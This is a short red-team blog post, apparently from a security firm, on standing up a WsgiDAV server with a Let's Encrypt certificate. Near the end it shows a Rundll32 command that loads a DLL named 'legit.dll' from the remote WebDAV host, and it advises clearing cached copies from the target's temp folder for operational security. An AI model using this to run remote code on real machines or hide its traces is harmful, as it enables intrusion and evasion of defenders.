June 08, 2018
How to Set Up a Quick, Simple WebDAV Server for Remote File Sharing
Written by
Hans Lakhan
![](https://trusted-sec.transforms.svdcdn.com/production/images/Thumb.jpg?w=320&h=320&auto=compress%2Cformat&fit=crop&dm=1693571906&s=c8bf68e169ec2973859ea379ac2d6f7f)
![](https://www.trustedsec.com/wp-content/uploads/2018/06/Remote.jpg)
# apt-get update # sudo apt-get upgrade # sudo apt-get install python-pipOnce pip is installed, you can install the WsgiDAV server by typing the following:
# pip install wsgidav
![](https://www.trustedsec.com/wp-content/uploads/2018/06/Picture1.png)
# pip install cheroot
![](https://www.trustedsec.com/wp-content/uploads/2018/06/Picture2.png)
![](https://www.trustedsec.com/wp-content/uploads/2018/06/Picture3.png)
$ sudo apt-get update $ sudo apt-get install software-properties-common $ sudo add-apt-repository ppa:certbot/certbot $ sudo apt-get update $ sudo apt-get install certbotNext, we need to create a directory for our WebDAV for sharing files:
$ mkdir -p /tmp/webdav/shareFor certbot to sign our certificate, we must have an open HTTP service to which it can connect. Certbot does this to validate your identity. In another terminal/screen, launch Python’s simple HTTP server:
![](https://www.trustedsec.com/wp-content/uploads/2018/06/Picture4.png)
![](https://www.trustedsec.com/wp-content/uploads/2018/06/Picture5.png)
ssl_certificate = "/etc/letsencrypt/live/carrot.ignorelist.com/cert.pem" ssl_certificate_chain = "/etc/letsencrypt/live/carrot.ignorelist.com/fullchain.pem" ssl_private_key = "/etc/letsencrypt/live/carrot.ignorelist.com/privkey.pem"I’ve created the following config under /tmp/webdav:
![](https://www.trustedsec.com/wp-content/uploads/2018/06/Picture6.png)
- Host is the IP address for the service; you can specify the wan IP, or just go quad 0s.
- Port is the port on which you’ll listen.
- Config points to the config file (with our three lines for certificates).
- Root is the path to where we are hosting our content.
# wsgidav --host=0.0.0.0 --port=443 --config webdav.conf --root ./share/
![](https://www.trustedsec.com/wp-content/uploads/2018/06/Picture7.png)
![](https://www.trustedsec.com/wp-content/uploads/2018/06/Picture8.png)
Rundll32.exe c:\TEMP\legit.dll,DLLMainYou can run:
Rundll32.exe “\\carrot.ignorelist.com@SSL@443\legit.dll”,DLLMain
![](https://www.trustedsec.com/wp-content/uploads/2018/06/Picture9.png)
- Using the above config, all files stored on the WebDAV service are anonymously read/write. This is terrible OPSEC. (Note: version 3.x of WsgiDAV supports read-only WebDAV, but is still in alpha.) Other WebDAV services (Apache) support read-only file access, but for a quick setup, you could just restrict access by IP and turn down the server when it’s not needed.
- Windows requires the WebClient service to be running (default startup state is manual).
- Files referenced via WebDAV are copied locally as a temporary file under %systemdrive%\windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore. Be sure to clear/remove files in this folder when you’re done using them.